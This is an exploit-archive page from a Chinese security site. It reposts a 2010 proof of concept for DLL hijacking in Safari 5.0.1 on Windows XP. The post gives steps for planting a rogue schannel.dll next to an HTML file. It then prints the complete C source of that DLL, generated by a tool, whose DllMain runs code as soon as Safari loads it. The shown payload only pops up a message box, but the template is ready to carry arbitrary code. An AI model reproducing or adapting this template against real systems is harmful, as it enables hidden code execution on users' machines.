首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Safari v5.0.1 DLL Hijacking (schannel.dll) Exploit
来源:vfocus.net 作者:Abderrahim 发布时间:2010-09-10  
Version: Safari 5.0.1
Tested on: Windows XP SP2
Author : Adrabi Abderrahim (Just Another Ghost In The Shell)
Note : This file has been generated by Hij4c0r Project more info visite
http://launchpad.net/hij4c0r.

Place a .html and schannel.dll in same folder and run file in safari.

Code for schannel.dll (original generated source file):

/**
* Author: <Your Name/Nick>
* E-Maill: <Your Mail>
* Description: <Your Description>
* Note : This file has been generated by Hij4c0r Project (remove this note is you want ^_^).
*/

#include <windows.h>
#define DLLIMPORT __declspec(dllexport)

void hij4c0r()
{
    //DON'T CHANGE THIS LINE
    MessageBox(NULL, "schannel.dll" , "DLL" , MB_ICONINFORMATION);
}

DLLIMPORT void hook_startup()
{
    hij4c0r();
}

BOOL APIENTRY DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hij4c0r();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Process Hacker Dll Hijacking E
·Beta Asp - Anket Database Disc
·CS Cart 1.3.3 - Install.php XS
·BlogItDL Database Disclosure E
·Audiotran 1.4.2.4 SEH Overflow
·Dmx Ready v2 lite Database Dis
·Acoustica MP3 Audio Mixer 2.47
·Wordpress 3.0.1 - Remote Denia
·Mozilla Firefox XSLT Sort Remo
·Adobe CoolType SING Table "uni
·Excel RTD Memory Corruption
·Java RMIConnectionImpl Deseria
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved